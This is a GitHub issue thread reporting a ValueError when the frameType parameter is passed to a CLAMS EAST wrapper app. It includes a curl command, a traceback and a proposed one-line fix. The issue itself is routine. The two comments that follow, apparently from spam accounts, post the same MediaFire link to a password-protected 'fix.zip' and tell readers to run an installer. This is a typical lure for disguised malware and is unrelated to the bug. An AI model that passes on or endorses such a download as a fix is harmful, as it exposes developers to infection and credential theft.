### ISSUE TITLE
Failure in using frameType parameter

### ISSUE THREAD

**Issue by 1192119703jzx** [clamsproject/app-east-wrapper#11]
### Bug Description

When I run the command ```curl -H "Accept: application/json" -X POST -d@/home/zixinjiang/east-eval/tf-modified/cpb-aacip-08fb0e1f287.mmif -s http://localhost:3000?frameType=slate > tf-test-output.mmif```, it should recognize the parameter frameType=slate with values "slate". However, it returns ```ValueError: Value for parameter "frameType" must be one of ['', 'slate', 'chyron', 'rolling-credit']```

This error is caused by the line of code ```choices=["", "slate", "chyron", "rolling-credit"]``` in metadata.py

### Reproduction steps

Run the app, using the command with frameType=slate, frameType=chyron, or frameType=slate&frameType=chyron

### Screenshots

Traceback (most recent call last):
  File "/home/zixinjiang/east/lib64/python3.9/site-packages/clams/restify/__init__.py", line 146, in post
    return self.json_to_response(self.cla.annotate(raw_data, **raw_params))
  File "/home/zixinjiang/east/lib64/python3.9/site-packages/clams/app/__init__.py", line 146, in annotate
    refined = self._refine_params(**runtime_params)
  File "/home/zixinjiang/east/lib64/python3.9/site-packages/clams/app/__init__.py", line 220, in _refine_params
    raise ValueError(f"Value for parameter \"{parameter.name}\" must be one of {parameter.choices}.")
ValueError: Value for parameter "frameType" must be one of ['', 'slate', 'chyron', 'rolling-credit'].

### Additional context

This bug can be solved by deleted the line of code ```choices=["", "slate", "chyron", "rolling-credit"]```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
